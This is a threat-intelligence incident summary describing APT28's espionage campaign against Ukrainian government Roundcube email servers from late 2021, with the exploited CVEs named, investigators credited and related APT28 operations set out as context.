Cyber Incident Victim: Government of Ukraine
Date:
Nov 2021
Location:
Ukraine
Summary
Russian state-linked APT28 hackers compromised Ukrainian government email servers by exploiting vulnerabilities in Roundcube webmail software, leveraging malicious emails related to the ongoing conflict. The attackers deployed scripts to redirect targeted individuals' incoming emails to attacker-controlled addresses while stealing address books, session cookies, and database-stored information for military intelligence collection. This campaign, operational since late 2021, targeted multiple government entities and organizations involved in military aircraft infrastructure, overlapping with previous APT28 operations that exploited Microsoft Outlook and Cisco router vulnerabilities. The group's activities aligned with broader Russian cyber-espionage efforts to gather intelligence supporting military operations against the country.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
In late 2021, Russian military intelligence hackers from the group APT28 (also known as BlueDelta, Fancy Bear, Sednit, and Sofacy) initiated a cyber-espionage campaign targeting Ukrainian government entities and critical infrastructure organizations. The attackers exploited vulnerabilities (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) in Roundcube email servers, leveraging malicious emails themed around the Russia-Ukraine conflict to compromise unpatched systems. Upon breaching the servers, they deployed scripts to redirect incoming emails of targeted individuals to attacker-controlled addresses, while simultaneously stealing Roundcube address books, session cookies, and database-stored information. Ukraine's CERT-UA and Recorded Future's Insikt Group jointly investigated the intrusions, identifying victims including a regional prosecutor's office, a central executive authority, and an organization involved in military aircraft infrastructure upgrades. The campaign's infrastructure remained operational from approximately November 2021 through at least mid-2023, with reconnaissance activities extending to additional Ukrainian government entities. APT28's primary objective was harvesting military intelligence to support Russia's invasion of Ukraine, as evidenced by the selective exfiltration of sensitive communications and operational data.
The incident demonstrated significant overlap with APT28's broader operational patterns, including their exploitation of the Microsoft Outlook zero-day CVE-2023-23397 between April and December 2022 to target European government, military, energy, and transportation organizations. This technique enabled credential theft and mailbox permission manipulation without user interaction. Google's Threat Analysis Group later reported that Russian threat actors, including APT28, accounted for approximately 60% of all phishing targeting Ukraine in early 2023. Historical context revealed APT28's sustained focus on intelligence gathering, including their 2015 breach of the German Federal Parliament and 2016 attacks on U.S. political committees, which resulted in EU sanctions against group members in 2020. Concurrently, U.S. and U.K. agencies warned of APT28 exploiting Cisco router vulnerabilities to deploy Jaguar Tooth malware against Western targets. The Ukrainian email server breaches underscored the group's continued adaptation of exploit chains against communication platforms to facilitate wartime intelligence collection.